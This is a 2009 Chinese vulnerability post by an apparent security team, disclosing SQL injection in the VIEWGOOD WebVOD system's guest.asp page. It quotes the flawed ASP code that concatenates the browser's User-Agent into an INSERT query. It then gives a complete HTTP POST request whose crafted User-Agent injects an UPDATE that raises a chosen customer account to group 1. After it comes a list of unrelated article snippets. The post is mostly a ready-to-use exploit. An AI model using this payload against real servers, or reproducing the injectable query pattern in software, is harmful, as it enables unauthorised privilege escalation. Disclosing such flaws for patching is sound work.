远古视频点播系统的一个注入漏洞
作者:toby57 来源:Wolves Security Team 发布时间:2009-03-01 12:54:00
标签:漏洞,注入,视频,安全
VIEWGOOD VOD视频点播系统 (WebVOD)
漏洞产生于文件/webmedia/oemui/user/guest.asp,访问这个页面需要注册
相关代码:
szAgent = Request.ServerVariables("HTTP_USER_AGENT")
aTmpInfo = Split(szAgent, " (", -1, 1)
aAgentInfo = Split(aTmpInfo(1), "; ", -1, 1)
szBrowser = aAgentInfo(1)
if Right(aAgentInfo(2), 1) = ")" or Right(aAgentInfo(2), 1) = ";" then
szOS = Left(aAgentInfo(2), Len(aAgentInfo(2)) - 1)
else
szOS = aAgentInfo(2)
end if
szClientIP = Request.ServerVariables("REMOTE_ADDR")
szSQL = "INSERT INTO GuestBook(CusTomer_ID,cont,ipaddr,ostype,browser,crdt) VALUES(" & iUserID & ",'" & szMemo & "','" & szClientIP & "','" & szOS & "','" & szBrowser & "','" & now &"')"
con.Execute szSQL
HTTP_USER_AGENT我们可以自己构造
POST /webmedia/oemui/user/guest.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
Referer: [url]http://you.are.fucked.cn/webmedia/oemui/user/guest.asp[/url]
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0','');update Customer_Group set Group_ID=1 where Customer_ID=9--; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: you.are.fucked.cn
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACDTQQ=CGGFJOGANCPNAIAIABABHMHA;
memo=aaaa&submit=%B7%A2%CB%CD%D3%C3%BB%A7%C1%F4%D1%D4%D0%C5%CF%A2+%3E%3E%3E
0
投稿猜你喜欢
- 在本系列的第一节中,讲了提高网站性能中网站“内容”有关的10条原则。除了在网站在内容上的改进外,在网站服务器端上也有需要注意和改
- 今天的互联网已经不同于以往,其中最主要的特点表现是网站众多。当然,这里还包括许多独立的博客。个人博客可以是生活里的琐事,也正是因为这种琐事,
1.配置ip地址前首先ifconfig查看网卡信息并获取到网卡的名称2.进入到网卡配置目录cd /etc/sysconfig/network- Permission denied:出现的原因的是:没有权限进行读、写、创建文件、删除文件等操作。解决方法:输入命令 sudo chmod
- 安装虚拟机VMware步骤一在官网下载虚拟机https://www.vmware.com/cn/products/workstation-p
- 11月19日消息,中国领先的社区平台与服务提供商康盛创想(Comsenz)旗下核心产品Discuz!新版正式发布。全新推出的Discuz!
- Read access:允许用户从服务器下载文件; Write access,:允许用户上载文件到服务器,但不允许修改、删除和重命
- 国防部新闻事务局设立、新闻发言人亮相……近年来,中国军队举措频频,以开放、务实、活跃的姿态引人注
- 一、虚拟机外面准备工作1.安装好的CentOS虚拟机2.CentOS虚拟机网络模式为NAT3.VM-编辑-虚拟网络编辑器设置如下4.计算机-
- 本文介绍了提升网站利润,宣传网站的一些方法,当然并不一定适用所有网站。 1、用活生生的标语广告宣传你的网站,呼唤人们行动起来。你必
- 很奇怪对不对?似乎所有教程都在教你,怎么为你的网站拉拢更多的看客,不管是正面诱导还是强女干眼球。先把人拉过来再说!人多了,点广告也好,买东西
- 很早以前就想转出了,但是一直嫌麻烦,因为不能自己直接获取转移密码,得邮寄证件什么的,就没有转移了,但是心里一直不舒服,有种域名没有真正在自己
- 随着互联网的快速发展,越来越多的网站面临着改版的需求,当我们隔一段时间再上某网站时,有时会惊讶的发现该网站已经改版了。其实网站改版就像是做整
- Confd和Consul是什么鬼?Confd和Consul都是用于配置管理和服务发现的工具。https://www.consul.io/ht
- 大家今天来木木的网站有没有发觉到网站有点不一样,没错是木木在网站加了两个广告,希望没有影响到你们的浏览。如果有你们感兴趣的广告,那么就在木木
- 一直以来,站长都在为自己的网站流量忙碌着,对于站长来说,流量就是钱,就是站长收入的主要来源。所以大家都在想尽办法来提高自己网站的流量。但是随
- 目前的视频网站,无疑站在一个十字路口。一方面是视频受众群体的增长,视频内容的不断扩充。另一方面是尚未明晰的政策,版权的重压。在尚未盈利,即将
- 大家都知道,根据我们之前的付款流程,当发布商的收入达到 $50 美元时,我们才会向发布商发送 PIN 码和启动电话确认。现在,我们对此流程进
- Git的简介Git是2005年Linus Torvalds 为了帮助管理 Linux(R) 内核开发而开发的一个开放源码的版本控制软件,正如
- 近日,国际知名的信息安全厂商卡巴斯基在沪举行了“自信自强,勇往直前”新闻发布会,揭开了卡巴斯基企业级新品的神秘面纱。据悉,新推出的卡巴斯基开
